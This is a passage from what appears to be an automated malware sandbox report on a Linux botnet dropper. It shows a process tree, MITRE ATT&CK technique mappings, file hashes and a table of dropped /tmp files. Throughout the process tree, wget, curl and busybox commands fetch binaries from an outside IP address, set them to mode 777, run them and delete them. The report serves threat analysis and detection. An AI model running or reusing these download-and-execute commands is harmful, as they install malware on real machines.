  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:888
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:889
- /bin/chmod
  chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - File and Directory Permissions Modification
  PID:890
- /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  ./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - Executes dropped EXE
  PID:891
- /bin/rm
  rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:892
- /usr/bin/wget
  wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:893
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:894
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:895
- /bin/chmod
  chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - File and Directory Permissions Modification
  PID:896
- /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  ./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - Executes dropped EXE
  PID:897
- /bin/rm
  rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:898
- /usr/bin/wget
  wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:899
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:900
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:901
- /bin/chmod
  chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - File and Directory Permissions Modification
  PID:902
- /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  ./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - Executes dropped EXE
  PID:903
- /bin/rm
  rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:904
- /usr/bin/wget
  wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:905
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:908
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:909
- /bin/chmod
  chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - File and Directory Permissions Modification
  PID:910
- /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  ./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - Executes dropped EXE
  PID:911
- /bin/rm
  rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:912
- /usr/bin/wget
  wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  PID:913

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
memory/843-1-0xb6719000-0xb672a044-memory.dmp

Download
memory/861-2-0xb6740000-0xb6751044-memory.dmp

Download
memory/861-3-0xb6758000-0xb6769044-memory.dmp

Download

ioc	pid	process
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB	685	aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx	695	6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo	717	uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7	737	d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X	763	sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l	784	0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc	798	TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv	804	yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc	812	xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq	818	mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ	824	KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e	833	1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t	841	jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5	847	6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc	853	xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq	859	mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ	865	KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e	873	1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t	879	jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5	885	6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB	891	aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx	897	6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo	903	uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7	911	d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7